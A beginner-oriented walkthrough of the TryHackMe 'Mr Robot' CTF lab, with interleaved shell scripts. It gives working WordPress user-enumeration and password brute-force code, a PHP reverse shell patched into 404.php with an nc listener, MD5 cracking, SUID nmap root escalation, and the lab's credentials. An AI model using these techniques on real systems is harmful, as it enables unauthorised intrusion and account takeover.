Mr Robot CTF (The Easy Way)

aayush malla
7 min read, Sep 29, 2020


Today we will be doing the Mr Robot CTF room on TryHackMe. Mr Robot is a CTF aimed at beginner and intermediate players.

First we have to download the OpenVPN configuration file and connect to the TryHackMe network using openvpn. The connection process is shown in the Mr Robot CTF room.

Now let's scan the given IP address using nmap or zenmap. If you are a beginner I recommend zenmap, as it is the graphical front end for nmap.

Here I will be using zenmap as it is easier to demonstrate. From the zenmap scan we can see that ports 80 and 443 are open.

fig 1: zenmap result

As port 80 is HTTP and 443 is HTTPS, let's paste the IP address into the browser to open the website.

A website opens. It is themed on the Mr Robot series.

fig 2: Mr Robot CTF website

Now let's search for directories on the website using gobuster.

Syntax for running gobuster against the website's IP address:

gobuster dir -u http://IP -w /path/to/wordlist

Here the -u flag specifies the URL

and the -w flag specifies the wordlist.

Example:

gobuster dir -u http://10.10.245.39 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 2>/dev/null

For directory searching we use the wordlist directory-list-2.3-medium.txt.

Here 2>/dev/null redirects any error output to /dev/null (it's not compulsory).

fig 3: results of gobuster

Now let's visit each directory to look for keys or any hints.

From trying a bunch of URLs I found that /wp-login and /robots are the two paths useful for us.

/wp-login is the WordPress login page.

fig 4:wp-login page

/robots (the site's robots.txt) lists the path of the first key and of a dictionary file. robots.txt is meant to keep crawlers away from paths, which is exactly why it is worth reading: it tells you what the owner did not want indexed.

fig 5: robots page

Now let's go to IP/key-1-of-3.txt.

For example: 10.10.72.66/key-1-of-3.txt (the machine gets a new IP each time it is deployed, which is why different addresses appear in the screenshots).

Once we open that URL we get the first key.

fig 6: key-1-of-3.txt

Similarly, go to IP/fsocity.dic to download the fsocity.dic file.

fig 7: fsocity.dic

Now let's check the number of entries inside the fsocity.dic file using the command:

wc fsocity.dic

fig 8: original word count of fsocity.dic

Here we can see that there are 858160 lines (the first column of wc, one candidate per line) in fsocity.dic. There is a high chance that many of them are duplicates, so let's eliminate the duplicate words.

For this we use the following command:

sort fsocity.dic | uniq > sorted_fscociety.dic

The command above sorts fsocity.dic and then stores the unique lines in sorted_fscociety.dic. The sort is required because uniq only collapses adjacent duplicates; sort -u would do both steps in one pass.

Now let's check the line count of sorted_fscociety.dic:

fig 9: sorted fsocity.dic

Here we can see that there are now 11451 entries, far fewer than 858160, which is what decides how long a brute-force run takes.
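The deduplication step above, as an added example that is not code from the original post. Besides what sort | uniq does, it strips Windows line endings and blank lines, which would otherwise make hydra or wpscan try "word" and "word\r" as two different guesses. The sample wordlist is constructed here; the real fsocity.dic has 858160 lines.

```shell
#!/bin/sh
# Added example (not code from the original post): normalise a brute-force
# wordlist the way "sort fsocity.dic | uniq" does, plus two cleanups that bite
# in practice: strip Windows line endings and drop empty lines.
# "uniq" only collapses *adjacent* duplicates, which is why the sort must come
# first; "sort -u" does both in one pass.

# dedup_wordlist IN OUT : unique, non-empty, CR-free lines of IN written to OUT
dedup_wordlist() {
    tr -d '\r' < "$1" | grep -v '^$' | sort -u > "$2"
}

# count_lines FILE : one candidate per line, so this is the wordlist size
count_lines() {
    wc -l < "$1" | tr -d ' '
}

# Constructed stand-in for fsocity.dic: repeated words, one with a trailing
# CR, and one blank line.
RAW=$(mktemp)
printf 'true\nfalse\nwikia\nfrom\ntrue\nwikia\r\n\ntrue\nelliot\nER28-0652\nfalse\n' > "$RAW"

CLEAN=$(mktemp)
dedup_wordlist "$RAW" "$CLEAN"
echo "before: $(count_lines "$RAW") lines, after: $(count_lines "$CLEAN") lines"
```

Run it on the real file with dedup_wordlist fsocity.dic sorted_fscociety.dic; the counts printed should match the wc output above.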

Now our task is to find the username and password for wp-login. For this we use the dictionary we just built (sorted_fscociety.dic).

For the username: as this room is based on the Mr Robot series, whose main character is Elliot, I tried elliot as the username with a random password. The page replied that the password for that username is incorrect, rather than that the username is invalid, which means the username is correct and only the password is wrong.

The process above is guessing based on the series, and it is not a realistic scenario: users who have not watched Mr Robot would find it hard to guess the username. Another way is to brute-force the username with the wordlist above and hydra. This works because WordPress returns a different error for an unknown username ("Invalid username") than for a known username with a wrong password, so the login form itself is a username oracle.

For this, first intercept the /wp-login request with Burp Suite to check the parameter names and the host.

fig 10: capturing request using burpsuite

Now let's use hydra to brute-force the username:

hydra -L sorted_fscociety.dic -p test 10.10.44.38 http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.245.39%2Fwp-admin%2F&testcookie=1:F=Invalid username"

-L reads the usernames to try from a file (one per line)

-p uses a single fixed password for every attempt

^USER^ and ^PASS^ mark where hydra substitutes the username and password in the form body

&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.245.39%2Fwp-admin%2F&testcookie=1 are the remaining form parameters, copied from the Burp capture (redirect_to is only echoed back by WordPress, so the IP inside it does not have to match the target)

:F=Invalid username is the failure string: a response containing it means the username does not exist, while a known user with a wrong password gets the different "password ... is incorrect" message, which hydra reports as a hit

10.10.44.38 is the target host

http-post-form selects hydra's HTTP POST form module

/wp-login/ is the path the form is posted to

Here we get elliot as the username.

Now let's brute-force elliot's password.

To perform the password brute force we use the wpscan tool.

The latest wpscan version asks for an API token, so first create an account on https://wpvulndb.com and use the generated API key. The token is only used for vulnerability lookups; the password attack itself runs without it, and a real token should never be pasted into a write-up.

The command to brute-force the password is:

wpscan --url http://IP/wp-login -U elliot -P /location_to_wordlist/ --api-token your_api_key

wpscan --url http://10.10.44.38/wp-login -U elliot -P ~/Downloads/sorted_fscociety.dic --api-token your_api_key

--url: the full URL you want to scan (don't forget the http; wpscan normally takes the site root, http://IP/)

-U: the username to use

-P: the password file to use

fig 11: output of wpscan

Now let's log in at /wp-login/ with the username elliot and the password ER28-0652.
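The hydra username enumeration and the wpscan password attack above both drive the same login form. The following is an added example, not code from the original post or from either tool: it reproduces by hand what they do against wp-login.php, so the oracle they rely on (the different WordPress error messages) is explicit, and it checks for the wordpress_logged_in cookie rather than trusting hydra's "no failure string means success" rule. It assumes curl is installed, that the login form is at /wp-login.php, and that HOST is a machine you are allowed to test; nothing touches the network unless you call wp_guess, wp_enum_users or wp_brute_pass yourself.

```shell
#!/bin/sh
# Added example, not part of the original post. WordPress answers
# "Invalid username" for an unknown user and "The password you entered for the
# username ... is incorrect" for a known user, which is what lets hydra
# enumerate users before any password is known.
# Assumed: curl is installed and HOST is a machine you are allowed to test.

# wp_login_body USER PASS HOST : the form body Burp shows (what hydra sends
# after replacing ^USER^ and ^PASS^). No URL-encoding of USER/PASS here, so a
# password containing & or + would be mangled; wp_guess uses --data-urlencode.
wp_login_body() {
    printf 'log=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1' \
        "$1" "$2" "$3"
}

# wp_classify : read headers+body of a login response on stdin, print one of
#   success | nouser | badpass | unknown
# A real login sets a wordpress_logged_in_* cookie; checking for it is safer
# than hydra's F= rule, which counts *any* page without the failure string
# (a lockout or rate-limit page included) as a valid login.
wp_classify() {
    resp=$(cat)
    case "$resp" in
        *wordpress_logged_in*) echo success ;;
        *"Invalid username"*)  echo nouser ;;
        *"is incorrect"*)      echo badpass ;;
        *)                     echo unknown ;;
    esac
}

# wp_guess HOST USER PASS : one POST (-i keeps the headers) and its verdict
wp_guess() {
    curl -s -i --data-urlencode "log=$2" --data-urlencode "pwd=$3" \
        -d 'wp-submit=Log+In' -d "redirect_to=http://$1/wp-admin/" -d 'testcookie=1' \
        "http://$1/wp-login.php" | wp_classify
}

# wp_enum_users HOST WORDLIST : like "hydra -L wordlist -p test": a fixed wrong
# password; every name answered with badpass instead of nouser exists
wp_enum_users() {
    while IFS= read -r u; do
        if [ "$(wp_guess "$1" "$u" test)" = badpass ]; then
            echo "valid user: $u"
        fi
    done < "$2"
}

# wp_brute_pass HOST USER WORDLIST : like "wpscan -U user -P wordlist"
wp_brute_pass() {
    while IFS= read -r p; do
        if [ "$(wp_guess "$1" "$2" "$p")" = success ]; then
            echo "$2:$p"
            return 0
        fi
    done < "$3"
    return 1
}

# Against a live target (placeholder IP):
#   wp_enum_users 10.10.245.39 sorted_fscociety.dic
#   wp_brute_pass 10.10.245.39 elliot sorted_fscociety.dic
```

The unknown verdict is the one to watch during a real run: if it starts appearing, the site is rate limiting or locking the account and the wordlist results after that point are meaningless.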

After logging in, let's try to get a shell on the web server with a reverse shell. For this we need to edit a file with a .php extension so that we can put PHP reverse shell code in it.

We will be editing 404.php: go to Appearance -> Editor and choose the 404 Template.

Now let’s replace the original content of the 404.php with the reverse shell code that you can obtain from

In the reverse shell code you have to put your own IP address (your attacking machine's VPN address, the one the target can reach):

$ip = '127.0.0.1'; // CHANGE THIS

You can also change the port number, but it's not compulsory:

$port = 1234; // CHANGE THIS

Now, to catch the reverse shell, start listening with netcat before triggering it:

nc -lnvp 1234

Here 1234 is the port number; it must match $port in the PHP file.

Now browse to IP/404.php to get the reverse shell. Any URL that does not exist renders the 404 template, which now runs our code.

fig 12 : getting unstable shell

Here we obtain a reverse shell which is not a proper TTY (no prompt, and commands like su will refuse to ask for a password). To get a usable shell we run:

python -c 'import pty; pty.spawn("/bin/bash")'

If a fully interactive TTY is needed, background the shell with Ctrl-Z, run stty raw -echo; fg on the attacking side, and then export TERM=xterm in the target shell.

fig 13 : getting stable shell

Here we get the stable shell.
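The 404.php edit above is done by hand in the WordPress theme editor. As an added example that is not code from the post or from the reverse shell's author, the helper below patches the two CHANGE THIS lines of the template from the command line, refuses values that are not an IPv4 address and a port number (anything else would end up inside PHP source), and prints the listener and trigger commands that go with them. The template text and the IPs are constructed placeholders.

```shell
#!/bin/sh
# Added example (not the post's own code): patch the two "CHANGE THIS" lines
# of a php-reverse-shell template from the shell. Assumes the template lines
# look like "$ip = '127.0.0.1';  // CHANGE THIS" and
# "$port = 1234;       // CHANGE THIS"; the IPs used below are placeholders.

# patch_revshell LHOST LPORT : template on stdin, patched PHP on stdout
patch_revshell() {
    case "$1" in
        ""|*[!0-9.]*) echo "patch_revshell: LHOST must be a dotted IPv4, got '$1'" >&2; return 1 ;;
    esac
    case "$2" in
        ""|*[!0-9]*)  echo "patch_revshell: LPORT must be numeric, got '$2'" >&2; return 1 ;;
    esac
    # [$] keeps the dollar sign literal in the sed pattern
    sed -e "s/^[\$]ip = '[^']*';/\$ip = '$1';/" \
        -e "s/^[\$]port = [0-9]*;/\$port = $2;/"
}

# revshell_commands LHOST LPORT TARGET : what to run on the attacker box, in order
revshell_commands() {
    printf 'nc -lnvp %s\n' "$2"
    printf 'curl -s http://%s/404.php   # any missing URL renders the 404 template\n' "$3"
}

# Constructed, abbreviated stand-in for the top of the reverse shell template
TEMPLATE=$(cat <<'EOF'
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
EOF
)

printf '%s\n' "$TEMPLATE" | patch_revshell 10.8.0.5 4444
revshell_commands 10.8.0.5 4444 10.10.245.39
```

Paste the patched output into the 404 Template field, start the listener, then request the URL; the order matters, since the PHP connects back the moment the page is rendered.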

Now let's go to the /home/robot directory, where we can see two files.

We don't have permission to read key-2-of-3.txt because we are currently the daemon user and the file is only readable by robot. However, we can read password.raw-md5, which holds an MD5 hash. MD5 is a hash, not encryption, so nothing can be decrypted: the only way in is to hash candidate passwords and compare. Let's crack the hash on our local machine using hashcat.

Command used

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

Here we copied the content of password.raw-md5 into hash.txt; -m 0 selects raw MD5. If the line carries a user:hash prefix, either strip the prefix or add --username so hashcat knows to ignore it.

fig 14 : cracked password.raw-md5

From the result we learn that the cracked password is abcdefghijklmnopqrstuvwxyz.
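What hashcat -m 0 does, as an added example that is not from the original post and uses md5sum instead of hashcat so it runs anywhere: hash each candidate, compare with the target, stop on the first match. The hash file and wordlist are constructed; the hash is computed from the password the post recovers, and the user:hash layout (with robot as the user) is an assumption about the file format, handled here the way --username handles it in hashcat.

```shell
#!/bin/sh
# Added example (not part of the original post): what "hashcat -m 0" does,
# done with md5sum. Raw MD5 is a hash, not encryption: nothing is decrypted,
# candidates are hashed and compared. Lines may be "hash" or "user:hash".

# md5_hex STRING : lowercase hex MD5 of STRING (no trailing newline hashed)
md5_hex() {
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | md5 -q      # macOS
    fi
}

# crack_md5 HASHFILE WORDLIST : print "hash:plaintext" for each cracked line
crack_md5() {
    while IFS= read -r line; do
        target=${line##*:}                       # drop a "user:" prefix if present
        target=$(printf '%s' "$target" | tr 'A-F' 'a-f')
        while IFS= read -r cand; do
            if [ "$(md5_hex "$cand")" = "$target" ]; then
                printf '%s:%s\n' "$target" "$cand"
                break
            fi
        done < "$2"
    done < "$1"
}

# Constructed inputs: the hash is MD5("abcdefghijklmnopqrstuvwxyz").
HASHES=$(mktemp)
WORDS=$(mktemp)
printf 'robot:c3fcd3d76192e4007dfb496cca67e13b\n' > "$HASHES"
printf 'password\n123456\nabcdefghijklmnopqrstuvwxyz\nqwerty\n' > "$WORDS"

crack_md5 "$HASHES" "$WORDS"
```

This loop hashes one candidate at a time in a subshell, so it is fine for a demo and hopeless for rockyou.txt; hashcat exists precisely because the comparison has to run millions of times per second.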

Now let’s change the user to robot

su robot

Password: abcdefghijklmnopqrstuvwxyz

fig 15 : getting robot access

Now let’s read the content of key-2-of-3.txt using command : cat key-2-of-3.txt

fig 16 : second key

Here we successfully get the second key.

The last flag in most CTFs is in the /root directory, which only the root user can access. A very common way of escalating privileges on a Linux system is to look for binaries that have the SUID bit set and abuse them.

So for the third key we need to get into /root, and for that we need to be root.

To find potential privilege escalation paths we can use linpeas, LinEnum, or simply the command below:

find / -perm +6000 2>/dev/null | grep '/bin/'

On current GNU find the +6000 form is no longer accepted; use -perm /6000 (any of the setuid/setgid bits) instead.

fig 17 : checking application with SETUID set

Here we can see nmap binaries are set to SUID bit and by searching i get to know that old version of nmap can be used to run shell command by using it in interactive mode

Command used:

nmap --interactive

!sh

Use sh rather than bash here: bash drops the effective UID it inherited from the SUID binary unless started with -p, while sh keeps it. Here we get root access; now let's read key-3-of-3.txt inside /root.

fig 18: getting root access

BINGO!! We get the third key.

From this lab we learned various techniques: information gathering (nmap, gobuster), getting a reverse shell, brute-forcing (hydra, wpscan), and privilege escalation (exploiting a SUID nmap).
